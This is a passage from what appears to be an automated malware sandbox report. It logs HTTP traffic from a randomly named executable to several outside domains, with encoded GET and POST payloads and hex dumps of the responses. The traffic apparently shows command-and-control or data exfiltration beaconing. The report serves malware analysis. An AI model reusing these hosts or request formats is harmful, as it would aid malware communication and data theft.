35 4b 38 52 54 37 41 62 4c 4a 50 32 72 46 69 38 52 35 46 6e 4d 45 68 72 50 65 76 47 62 69 64 75 41 61 66 6a 74 4c 5a 2b 35 4b 7a 47 34 6b 79 34 71 6c 52 45 30 65 6e 58 2b [TRUNCATED]
              Data Ascii: 0th4S=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w94k9kVeeRFPK1zuTu7OxJTFDYB/8428iLRBH9R2f4R9Mm82Y4SG4L1C3UduQRW4P/iP3ErLpKnvGnQ9eelKXadN0o0iPXXUO9nHnlvG9zCTdy+qHNVS2otQN9QzXJKtdVRQsvqtiwpaQ4QjfnU06alpN/NQzbJ6A13W0JTFsZnMdweQ2M1tFk0ldOb4tqpneetW0QdgRu9kIQb8aUVX+iAtPEC2eXHsTI+DmNl5/kT5K8RT7AbLJP2rFi8R5FnMEhrPevGbiduAafjtLZ+5KzG4ky4qlRE0enX+0sx2ClC8crqKO8X5RRcsKD0GBAto/oU7FnzLFyAPMzEy6czaVu5jSH6Pl8L64RsUbPM7XvpTnv9FohbAl80fFtewUX3bt3g9ZUJHo4lgHXMyvyEaxQDX3l11hkJyQb3o6cLaWwgCSAy1zn36r7oSOWEzLeTelrwrwAswQ751TehXoLsOxgf+begpJ7XKEjNmUrA8rM7C89Y3rptpbrAlDA3r0NZbY1lNWxq+jThVfEFkGZGv22SnUflvdtQxkmTjAxVg9bJ68q8Rn6Kt1CXD8lJ0duVjWZ9zRyoUiNPKeN14js63USNItr42FO913an45PBWgAH+IdjyEFH7wCP6p0v1SOY0ht3Umij5Zh/CSBBZNewg1f7U2KsYKhHTraG5pCDbf7yypUHD0edwhbU7n2L+sozQ64aEh8Qwqr1ubWz66hq/trrKB4bM0VHVTCiP0vGikaJX//WlQS6HHueINeeEALEvklv4dFk3gDK20gEses7P2lMvwPYoBR4DdfDCX3sWIA+LgFeC7KxgMze2W1bj0bsnntV03L+QcYoKZPZABbTootQB4aYGG4pozm2aLD3Xnu38TMwv871I1CvG4bZTiSeURYjANtbjoIahNnLESCmMSb+6JujvISukZ/rEFcW71C7+RFwaGcPA1kmKsdhK+bVwLst8NJ [TRUNCATED]
              Sep 22, 2024 17:58:42.837322950 CEST691INHTTP/1.1 404 Not Found
              Server: nginx
              Date: Sun, 22 Sep 2024 15:58:42 GMT
              Content-Type: text/html
              Content-Length: 548
              Connection: close
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              32192.168.2.114975043.242.202.169806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:58:44.237627029 CEST546OUTGET /e0nr/?0th4S=K/5K1kUHGJjjXPwyVklTimZmxQWW0oII6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txP0JHW5az1rIxyFBBCDSCP7ShkB7z26H/KD0=&u2pl=VvmP2xFp HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.mizuquan.top
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:58:45.222044945 CEST691INHTTP/1.1 404 Not Found
              Server: nginx
              Date: Sun, 22 Sep 2024 15:58:45 GMT
              Content-Type: text/html
              Content-Length: 548
              Connection: close
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              33192.168.2.1149751103.224.182.242806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:58:50.713645935 CEST821OUTPOST /pp43/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.nobartv6.website
              Origin: http://www.nobartv6.website
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 202
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.nobartv6.website/pp43/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6d 57 79 55 2f 72 32 54 6e 52 34 4f 43 34 6f 44 57 2f 38 6b 68 4b 35 71 71 76 73 35 67 41 52 5a 47 76 47 33 5a 72 2f 38 69 75 52 54 43 69 35 58 4d 33 68 72 50 78 6c 30 72 70 63 57 4e 41 47 6a 49 66 43 74 46 75 33 45 6d 37 65 78 4c 6b 68 70 4b 33 32 51 63 45 43 70 63 44 7a 69 31 6c 2f 6a 68 51 58 6b 38 45 46 6b 5a 51 6c 66 66 46 4c 77 4a 4f 71 4c 49 44 56 2f 56 71 64 77 70 39 53 6f 68 75 65 46 56 7a 42 4f 47 78 6e 79 54 51 7a 30 51 49 52 77 74 43 44 30 50 36 51 79 42 31 54 35 41 7a 36 7a 67 48 71 33 63 62 44 67 35 76 46 32 30 46 54 73 4b 51 3d 3d
              Data Ascii: 0th4S=ywbiYQ/q4W1CmWyU/r2TnR4OC4oDW/8khK5qqvs5gARZGvG3Zr/8iuRTCi5XM3hrPxl0rpcWNAGjIfCtFu3Em7exLkhpK32QcECpcDzi1l/jhQXk8EFkZQlffFLwJOqLIDV/Vqdwp9SohueFVzBOGxnyTQz0QIRwtCD0P6QyB1T5Az6zgHq3cbDg5vF20FTsKQ==
              Sep 22, 2024 17:58:51.300920963 CEST876INHTTP/1.1 200 OK
              date: Sun, 22 Sep 2024 15:58:51 GMT
              server: Apache
              set-cookie: __tad=1727020731.2885297; expires=Wed, 20-Sep-2034 15:58:51 GMT; Max-Age=315360000
              vary: Accept-Encoding
              content-encoding: gzip
              content-length: 581
              content-type: text/html; charset=UTF-8
              connection: close
              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
              Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              34192.168.2.1149752103.224.182.242806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:58:53.263495922 CEST841OUTPOST /pp43/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.nobartv6.website
              Origin: http://www.nobartv6.website
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 222
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.nobartv6.website/pp43/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6e 32 43 55 73 59 75 54 69 78 34 4a 4f 59 6f 44 66 66 38 34 68 4b 6c 71 71 75 59 54 68 79 6c 5a 66 4e 65 33 4c 5a 48 38 6c 75 52 54 4a 43 35 53 43 58 67 47 50 32 74 38 72 6f 77 57 4e 41 36 6a 49 65 79 74 46 64 66 4c 33 37 65 7a 43 45 68 6e 46 58 32 51 63 45 43 70 63 43 58 4d 31 6a 58 6a 67 6c 66 6b 2b 6c 46 72 52 77 6c 59 50 31 4c 77 4e 4f 71 50 49 44 56 4a 56 72 42 65 70 34 65 6f 68 73 47 46 57 69 42 4a 64 68 6e 34 64 77 7a 69 5a 35 34 72 72 7a 4f 45 50 71 4d 50 4b 31 72 4f 42 31 72 70 77 6b 6a 67 66 49 4c 69 74 4a 6b 47 39 30 32 6c 52 58 68 46 45 34 31 49 44 46 4c 61 39 4f 6c 45 4f 6a 66 39 69 61 55 3d
              Data Ascii: 0th4S=ywbiYQ/q4W1Cn2CUsYuTix4JOYoDff84hKlqquYThylZfNe3LZH8luRTJC5SCXgGP2t8rowWNA6jIeytFdfL37ezCEhnFX2QcECpcCXM1jXjglfk+lFrRwlYP1LwNOqPIDVJVrBep4eohsGFWiBJdhn4dwziZ54rrzOEPqMPK1rOB1rpwkjgfILitJkG902lRXhFE41IDFLa9OlEOjf9iaU=
              Sep 22, 2024 17:58:54.017046928 CEST876INHTTP/1.1 200 OK
              date: Sun, 22 Sep 2024 15:58:53 GMT
              server: Apache
              set-cookie: __tad=1727020733.8201675; expires=Wed, 20-Sep-2034 15:58:53 GMT; Max-Age=315360000
              vary: Accept-Encoding
              content-encoding: gzip
              content-length: 581
              content-type: text/html; charset=UTF-8
              connection: close
              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
              Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              35192.168.2.1149753103.224.182.242806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:58:55.820688009 CEST1854OUTPOST /pp43/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.nobartv6.website
              Origin: http://www.nobartv6.website
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1234
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.nobartv6.website/pp43/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6e 32 43 55 73 59 75 54 69 78 34 4a 4f 59 6f 44 66 66 38 34 68 4b 6c 71 71 75 59 54 68 79 64 5a 44 75 57 33 5a 4f 54 38 6b 75 52 54 41 69 35 54 43 58 68 45 50 77 46 34 72 6f 4d 47 4e 47 2b 6a 4a 39 71 74 4f 4d 66 4c 75 72 65 7a 64 55 68 6d 4b 33 33 4b 63 45 53 74 63 44 6e 4d 31 6a 58 6a 67 69 76 6b 33 55 46 72 58 77 6c 66 66 46 4c 38 4a 4f 71 6a 49 44 4e 5a 56 6f 74 67 6f 4d 69 6f 68 4d 57 46 47 41 5a 4a 52 68 6e 2b 61 77 79 68 5a 35 6b 4f 72 7a 54 39 50 70 51 6c 4b 32 37 4f 43 6a 75 4f 74 6e 72 50 44 34 33 70 77 49 64 6a 2f 6d 36 31 49 51 70 45 43 4b 35 59 63 46 54 79 38 65 38 49 55 47 66 35 32 74 49 44 63 51 4e 79 73 47 52 72 59 58 41 78 4b 2b 48 43 34 34 4e 34 73 65 43 35 4a 4d 2b 4e 79 6c 4c 4f 4c 53 32 61 45 31 75 58 7a 32 46 70 78 61 56 39 7a 69 75 69 61 52 74 6c 4c 5a 76 62 77 5a 52 59 41 4c 55 78 71 62 4f 6c 69 37 55 69 38 45 56 69 64 65 4e 61 6b 75 73 48 48 50 73 31 52 4d 38 41 32 55 6a 50 36 2b 6d 55 78 51 78 2b 73 37 4d 42 54 61 65 74 [TRUNCATED]
              Data Ascii: 0th4S=ywbiYQ/q4W1Cn2CUsYuTix4JOYoDff84hKlqquYThydZDuW3ZOT8kuRTAi5TCXhEPwF4roMGNG+jJ9qtOMfLurezdUhmK33KcEStcDnM1jXjgivk3UFrXwlffFL8JOqjIDNZVotgoMiohMWFGAZJRhn+awyhZ5kOrzT9PpQlK27OCjuOtnrPD43pwIdj/m61IQpECK5YcFTy8e8IUGf52tIDcQNysGRrYXAxK+HC44N4seC5JM+NylLOLS2aE1uXz2FpxaV9ziuiaRtlLZvbwZRYALUxqbOli7Ui8EVideNakusHHPs1RM8A2UjP6+mUxQx+s7MBTaetQYwf5gfkIpIvSm+SN4B3CAPRs7Mv9RLd4M363hoxizoxN4zEE3kE+au5my2Cy1zt7r64ti89c7j0hBKnxmWkCkXG3xGYAYQMkDlmcffII6H3JML1Y+tdy2cTg/fxui0iabl1d/VHZ5A4SEhS/kk2nYdpkMtOEyzugnRml/wE28FlgpeUCYFsagb8YbBj3bV1cJ8Pe+tUmJYdyr64VtvLqMJ+qloagHAXXdfpLOWhmjg3Nz7OAJ6SU1h6d1D3t2pdGu/LZhfspkn3pfTLEeWVXehWZX76G0zSDhd0qotyJlMSF8W0CEfHbgUz3UqZ0Cb94UX+c/jrksh1cT9kOGWsCif10BegkskGlCaL4RpSkjGbdqmnEWejcuDRnTKrdhZfwpttAYKeBgDWsm67lPT8CSgRZ4ISmKYPfea5CdcbmeLqWxNe94zuXbtGS1amdNU0MQcK0i2HFqJ3WymwiOSkn2Xau07VVsO2maHPI+QRuUAheUfBKgn7HmGRxpBRkvmzVAAf07RZZzfhkIWuNhUfvN/TGmiHU0i4k7JFvM7H6bnoznusvmxzucDdHCi53BfbtEpceeBB1f7Ziq3h7JvvVJG+xKTvy0LKNw8BNILUNJ9mtMaQsXq85ijmi91iLf48a6mM1dEKjpZ/En1VtNoLrJu8HW+R1T2GRz [TRUNCATED]
              Sep 22, 2024 17:58:56.516799927 CEST876INHTTP/1.1 200 OK
              date: Sun, 22 Sep 2024 15:58:56 GMT
              server: Apache
              set-cookie: __tad=1727020736.2641658; expires=Wed, 20-Sep-2034 15:58:56 GMT; Max-Age=315360000
              vary: Accept-Encoding
              content-encoding: gzip
              content-length: 581
              content-type: text/html; charset=UTF-8
              connection: close
              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
              Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              36192.168.2.1149754103.224.182.242806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:58:58.380326033 CEST550OUTGET /pp43/?0th4S=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVr6vGFx1RKES4JkCccCfv+nr7lBPNi1x5RxE=&u2pl=VvmP2xFp HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.nobartv6.website
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:58:59.129720926 CEST1236INHTTP/1.1 200 OK
              date: Sun, 22 Sep 2024 15:58:59 GMT
              server: Apache
              set-cookie: __tad=1727020739.4873587; expires=Wed, 20-Sep-2034 15:58:59 GMT; Max-Age=315360000
              vary: Accept-Encoding
              content-length: 1499
              content-type: text/html; charset=UTF-8
              connection: close
              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6e 6f 62 61 72 74 76 36 2e 77 65 62 73 69 74 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6f 62 61 72 74 76 36 2e 77 65 62 73 69 74 65 2f 70 70 34 33 2f 3f 30 74 68 34 53 3d 2f 79 7a 43 62 6c 72 4a 73 45 52 75 71 67 7a 7a 76 70 62 46 68 45 5a 58 50 72 45 64 52 4f 67 75 2b 36 5a 68 38 2f 38 59 71 42 30 31 46 75 4f 2b 44 4c 58 66 67 63 6c 76 48 6e 74 33 43 57 4e 75 47 6c 6c 58 74 70 30 38 47 6e 4c 51 4b 4a 32 69 43 74 6a 56 72 36 76 47 46 78 31 52 4b 45 53 34 4a 6b 43 63 63 43 66 76 2b 6e 72 37 6c 42 50 4e 69 31 78 35 52 78 45 3d 26 75 32 70 [TRUNCATED]
              Data Ascii: <html><head><title>nobartv6.website</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.nobartv6.website/pp43/?0th4S=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVr6vGFx1RKES4JkCccCfv+nr7lBPNi1x5RxE=&u2pl=VvmP2xFp&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#
              Sep 22, 2024 17:58:59.133064032 CEST535INData Raw: 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6f 62 61 72 74 76 36 2e 77
              Data Ascii: ffffff" text="#000000"><div style='display: none;'><a href='http://www.nobartv6.website/pp43/?0th4S=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVr6vGFx1RKES4JkCccCfv+nr7lBPNi1x5RxE=&u2pl=VvmP2xFp&fp=-3'>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              37192.168.2.114975585.159.66.93806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:59:04.272751093 CEST809OUTPOST /lrst/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.sailnway.net
